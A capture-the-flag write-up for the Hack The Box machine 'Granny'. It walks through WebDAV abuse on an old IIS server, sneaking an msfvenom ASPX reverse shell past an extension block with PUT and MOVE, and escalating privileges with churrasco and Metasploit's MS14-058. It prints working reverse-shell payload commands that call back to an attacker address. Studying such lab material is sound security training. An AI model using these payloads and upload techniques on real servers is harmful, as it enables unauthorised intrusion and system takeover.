Hackthebox writeup for granny
Mind Opener
The http protocol allows us to use methods like GET , POST, PUT, DELETE to send/delete data, however are there any methods with which we can edit, copy or manage files on a remote server ?
If such protocol/extension allows you to copy or move files, can you abuse this functionality to compromise a server ?
As always, begin with the nmap scan,
From the nmap scan, three things are important
- Port 80 is open and running outdated Microsoft IIS server.
2. The webdav(extension of http protocol) is being used.
3. Multiple HTTP methods are allowed.
What is webdav ?
WebDAV stands for “Web-based Distributed Authoring and Versioning”. It is a set of extensions to the HTTP protocol which allows users to collaboratively edit and manage files on remote web servers.
Use the davtest scanner, which uploads test executable to determine if the services are exploitable.
davtest -url http://10.10.10.15
To analyze the working of webdav add a new proxy listener on burp and redirect its traffic to the victim.
curl localhost
davtest -url http://localhost
From burp history, grab a file that’s successfully uploaded and send this to repeater.
From the repeater tab create another html file.
The good news is,
- We can simply access the upload directory(no dirbuster this time !)
- We are also permitted to upload a file
Create a payload using msfvenom.
msfvenom -p windows/shell_reverse_tcp -f aspx LHOST=10.10.14.20 LPORT=4455 -o shell.aspx
but the bad news is, putting aspx file is forbidden.
From the nmap scan we know that the MOVE method is allowed. About webdav features read here
MOVE method syntax below,
MOVE /source HTTP/1.1
Destination: /destination
The burpsuite method was described in the ippsec video(the best), however as I read further(Specially thanks to 0xdf articles)… I came to know that it is possible to upload shell using curl as well (Various different syntaxes in that too). I have learnt and tried both the methods.
Shell upload using burpsuite
Rename the msfvenom payload to testshell.html and upload with PUT method.
And then use the move method change the extension to aspx.
Start a netcat listener and grab shell.
curl http://10.10.10.15/shell.aspx
Shell upload using curl
Rename shell.aspx to shell.txt and upload
cp shell.aspx shell.txt
curl http://10.10.10.15 — upload-file shell.txt
Rename it back to aspx with MOVE.
curl -X MOVE --header “Destination:http://10.10.10.15/aspshell.aspx" http://10.10.10.15/shell.txt
- X, — request <command> Specify request command to use
- -H, — header <header/@file> Pass custom header(s) to server
and grab shell.
This machine shows access denied while trying to grab the user.txt flag. So we’ll move to privilage escalation.
Privilege Escalation
Run windows exploit suggester
git clone https://github.com/GDSSecurity/Windows-Exploit-Suggester.git
Check its readme file for the usage and proceed
./windows-exploit-suggester.py --update
An excel file is created at this step
Run the systeminfo command on the granny machine and paste its output on the attacker machine, save it in the systeminfo.txt file.
I had to install few xlrd packages, commands are listed in the screenshot below. After installing the packages, run exploit suggester.
./windows_exploit_suggester.py --database 2021-07-09-mssb.xls --systeminfo systeminfo.txt
Multiple exploits are suggested, since I had used MS15–051 in bastard machine, I did not try it here and went ahead with the churrasco exploit.
Mor about Access tokens, ACL and token hijacking at below given links,
https://docs.microsoft.com/en-us/windows/win32/secauthz/access-tokens?redirectedfrom=MSDN
https://dl.packetstormsecurity.net/papers/presentations/TokenKidnapping.pdf
Priv Esc in Action
Upload and rename the churrasco.exe file using the same methods that we used earlier
curl -X MOVE --header "Destination:http://10.10.10.15/chr.exe" http://10.10.10.15/chr.txt
The file is moved to the inetpub/wwwroot directory, but we do not have write permission. So create a temp directory and copy our exploit.
chr.exe -d “cmd” executes the command, however it does not give us a stable system shell. So we create a reverse shell executable and use churrasco to execute it to get an admin session.
Generate reverse shell and copy it to granny with same methods discussed previously.
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.20 LPORT=6677 -f exe -o revshell.exe
Copy the revshell to granny machine and exploit using the churrisco.exe file that we copied earlier.
Grab the system shell at netcat server and catpure the flag.
Granny Exploitation using metasploit
Generate a payload with msfvenom
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.19 LPORT=5566 -f aspx > payload.aspx
Upload the payload to server
In the msfconsole, start the exploit/multi/handler module
use exploit/multi/handler
Tell meterpreter which payload to expect, so we configure it to have the same settings as the executable we generated.
set payload windows/meterpreter/reverse_tcp
Visit the file in browser and it opens a meterpreter session for us.
We cannot capture the user flag, as access is denied
So, we need to move to privilage escalation, background the session and use exploit suggester as below, set session and run
Use MS14–058 and run
Grab the root flag
Skills that I learnt from this machine
- List and understand the usage of http methods
- Incorporate the use of http methods with curl / burpsuite repeater to put, move / copy data
- Use the webdav MOVE method to replace files with executables
- Practical hands on of msfvenom and meterpreter
- Using windows exploit suggester and churrasco exploit for privilage escalation.